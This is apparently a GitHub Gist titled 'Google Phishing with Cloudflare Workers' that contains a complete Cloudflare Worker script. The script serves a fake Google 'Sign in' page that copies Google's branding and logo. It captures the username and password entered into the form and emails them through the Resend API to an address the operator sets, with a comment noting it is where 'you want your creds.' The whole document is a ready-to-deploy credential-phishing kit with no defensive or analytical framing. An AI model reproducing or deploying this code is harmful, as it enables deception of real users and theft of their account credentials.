Created
January 7, 2025 10:10
-
-
Save anir0y/a42b862fd6dd1b81c5b28d8b8edf1f50 to your computer and use it in GitHub Desktop.
Google Phishing with Cloudflare Workers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| addEventListener('fetch', event => { | |
| event.respondWith(handleRequest(event.request)); | |
| }); | |
| const htmlContent = ` | |
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>Login Page</title> | |
| <script> | |
| async function handleSubmit(event) { | |
| event.preventDefault(); | |
| const formData = new FormData(event.target); | |
| const username = formData.get('username'); | |
| const password = formData.get('password'); | |
| const response = await fetch('/api/login', { | |
| method: 'POST', | |
| headers: { | |
| 'Content-Type': 'application/json', | |
| }, | |
| body: JSON.stringify({ username, password }), | |
| }); | |
| if (response.ok) { | |
| console.log ('Credentials sent successfully.'); | |
| } else { | |
| console.log ('An error occurred while sending credentials.'); | |
| } | |
| } | |
| </script> | |
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <title>Sign in - Google Accounts</title> | |
| <style> | |
| body { | |
| font-family: Arial, sans-serif; | |
| background: #f1f1f1; | |
| margin: 0; | |
| padding: 0; | |
| display: flex; | |
| justify-content: center; | |
| align-items: center; | |
| min-height: 100vh; | |
| } | |
| .login-container { | |
| background: white; | |
| padding: 48px 40px 36px; | |
| border: 1px solid #dadce0; | |
| border-radius: 8px; | |
| width: 100%; | |
| max-width: 450px; | |
| box-sizing: border-box; | |
| } | |
| .google-logo { | |
| text-align: center; | |
| margin-bottom: 25px; | |
| } | |
| .google-logo img { | |
| width: 75px; | |
| height: auto; | |
| } | |
| h1 { | |
| font-size: 24px; | |
| font-weight: 400; | |
| text-align: center; | |
| margin: 0 0 30px; | |
| color: #202124; | |
| } | |
| .subtitle { | |
| font-size: 16px; | |
| font-weight: 400; | |
| text-align: center; | |
| margin-bottom: 32px; | |
| color: #202124; | |
| } | |
| .form-group { | |
| margin-bottom: 24px; | |
| } | |
| input[type="text"], | |
| input[type="password"] { | |
| width: 100%; | |
| padding: 13px 15px; | |
| font-size: 16px; | |
| border: 1px solid #dadce0; | |
| border-radius: 4px; | |
| margin: 8px 0; | |
| box-sizing: border-box; | |
| } | |
| input[type="text"]:focus, | |
| input[type="password"]:focus { | |
| border-color: #1a73e8; | |
| outline: none; | |
| } | |
| .forgot-link { | |
| color: #1a73e8; | |
| text-decoration: none; | |
| font-weight: 500; | |
| font-size: 14px; | |
| display: inline-block; | |
| margin: 8px 0; | |
| } | |
| .forgot-link:hover { | |
| text-decoration: underline; | |
| } | |
| .button-container { | |
| display: flex; | |
| justify-content: space-between; | |
| align-items: center; | |
| margin-top: 32px; | |
| } | |
| .create-account { | |
| color: #1a73e8; | |
| text-decoration: none; | |
| font-weight: 500; | |
| font-size: 14px; | |
| } | |
| .create-account:hover { | |
| text-decoration: underline; | |
| } | |
| .next-button { | |
| background: #1a73e8; | |
| color: white; | |
| padding: 12px 24px; | |
| border: none; | |
| border-radius: 4px; | |
| font-size: 14px; | |
| font-weight: 500; | |
| cursor: pointer; | |
| text-transform: uppercase; | |
| } | |
| .next-button:hover { | |
| background: #1557b0; | |
| } | |
| </style> | |
| </head> | |
| <body> | |
| <div class="login-container"> | |
| <div class="google-logo"> | |
| <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png" alt="Google Logo"> | |
| </div> | |
| <h1>Sign in</h1> | |
| <p class="subtitle">Use your Google Account</p> | |
| <form id="loginForm" onsubmit="handleSubmit(event)"> | |
| <div class="form-group"> | |
| <input type="text" id="username" name="username" placeholder="Email or phone" required> | |
| </div> | |
| <div class="form-group"> | |
| <input type="password" id="password" name="password" placeholder="Password" required> | |
| </div> | |
| <a href="#" class="forgot-link">Forgot password?</a> | |
| <div class="button-container"> | |
| <a href="#" class="create-account">Create account</a> | |
| <button type="submit" class="next-button">Next</button> | |
| </div> | |
| </form> | |
| </div> | |
| `; | |
| async function handleRequest(request) { | |
| if (request.method === 'GET' && new URL(request.url).pathname === '/') { | |
| return new Response(htmlContent, { headers: { 'Content-Type': 'text/html' } }); | |
| } else if (request.method === 'POST' && new URL(request.url).pathname === '/api/login') { | |
| try { | |
| const data = await request.json(); | |
| const { username, password } = data; | |
| const resendResponse = await fetch('https://api.resend.com/emails', { | |
| method: 'POST', | |
| headers: { | |
| 'Content-Type': 'application/json', | |
| 'Authorization': 'Bearer re_12345' | |
| }, | |
| body: JSON.stringify({ | |
| from: '[email protected]', // Change this to resend verified domain | |
| to: '[email protected]', // your email where you want your creds. | |
| subject: 'User Credentials', | |
| html: `<p>Username: ${username}</p><br><p>Password: ${password}</p>`, | |
| }), | |
| }); | |
| if (resendResponse.ok) { | |
| return new Response('Credentials sent successfully.', { status: 200 }); | |
| } else { | |
| const errorData = await resendResponse.json(); | |
| return new Response(`Error sending email: ${errorData.message}`, { status: 500 }); | |
| } | |
| } catch (error) { | |
| return new Response(`An error occurred: ${error.message}`, { status: 500 }); | |
| } | |
| } else { | |
| return new Response('Not Found', { status: 404 }); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment